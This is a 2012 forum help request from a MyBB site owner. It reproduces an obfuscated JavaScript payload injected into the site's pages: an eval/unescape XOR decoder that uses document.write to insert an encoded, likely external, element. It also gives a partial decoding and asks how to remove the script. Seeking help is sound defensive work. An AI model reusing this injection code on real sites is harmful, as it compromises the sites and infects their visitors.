2012-07-29, 12:25 PM
Recently one of my members has reported me, that my website has malware. I am running it on MyBB 1.6.4 at the moment and the board URL is http://nosforum.com
Now if you view the source code, all the way on the bottom is this:
I have encoded it with some tools and have received this:
What is that and how do I get rid of it?
Now if you view the source code, all the way on the bottom is this:
<script type="text/javascript">
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%67%63%30%62%62%62%36%39%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%31%31%33%34%39%36%33%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%36%30%34%34%37%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%39%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%67%63%30%62%62%62%36%39%28%27') + '%43%70%69%7e%6c%77%67%2c%7a%7b%68%42%2c%77%7f%7b%7c%45%39%31%69%7d%82%7d%79%31%74%7f%31%69%7e%77%31%78%68%76%7d%3c%68%6c%7e%7b%6a%73%7f%88%32%7f%71%7d%2f%2e%86%70%6b%78%77%47%22%3c%2d%29%75%6a%75%76%73%7b%43%2d%38%22%2c%6d%78%7f%69%69%7d%44%2d%3c%2d%28%31%4221134963%36%32%36%35%36%31%39' + unescape('%27%29%29%3b'));
</script>
I have encoded it with some tools and have received this:
eval(unescape('function gc0bbb69(s) {
var r = "";
var tmp = s.split("21134963");
s = unescape(tmp[0]);
k = unescape(tmp[1] + "560447");
for( var i = 0; i < s.length; i++) {
r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-9);
}
return r;
}
'));
eval(unescape('document.write(gc0bbb69('') + 'Cpi~lwg,z{hB,w{|E91i}}y1t1i~w1xhv}<hl~{js2q}/.pkxwG"<-)ujuvs{C-8",mxii}D-<-(1B211349636265619' + unescape(''));'));
What is that and how do I get rid of it?